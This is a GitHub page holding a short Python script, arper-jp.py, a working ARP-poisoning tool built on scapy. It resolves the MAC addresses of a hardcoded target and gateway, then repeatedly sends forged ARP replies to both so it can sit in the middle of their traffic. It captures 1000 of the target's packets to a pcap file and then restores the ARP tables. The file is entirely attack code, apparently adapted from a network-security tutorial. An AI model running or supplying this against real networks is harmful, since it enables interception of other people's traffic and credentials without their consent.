-
Notifications
You must be signed in to change notification settings - Fork 0
/
arper-jp.py
103 lines (77 loc) · 2.7 KB
/
arper-jp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
# -*- coding: utf-8 -*-
from scapy.all import *
import os
import sys
import threading
import signal
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
# restore by send
print "[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
# send ARP request to ip_address
def get_mac(ip_address):
responses,unanswerd = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address), timeout=2, retry=10)
# srp is function that send ARP request to the ip_address
# back mac address in response
for s,r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac,stop_event):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [Ctrl-C to stop]"
while True:
send(poison_target)
send(poison_gateway)
if stop_event.wait(2):
break
print "[*] ARP poison attack finished."
return
interface = "eth0"
target_ip = "192.168.0.9"
gateway_ip = "192.168.0.1"
packet_count = 1000
# setting of interface
conf.iface = interface
# stop output
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
# run thread to pollute
stop_event = threading.Event()
poison_thread = threading.Thread(target = poison_target,
args = (gateway_ip, gateway_mac, target_ip, target_mac, stop_event))
poison_thread.start()
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
# save captured packets
wrpcap('arper.pcap',packets)
# stop thread to pollute
stop_event.set()
poison_thread.join()
# join() is function that waits till thread is finished
# recover network
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)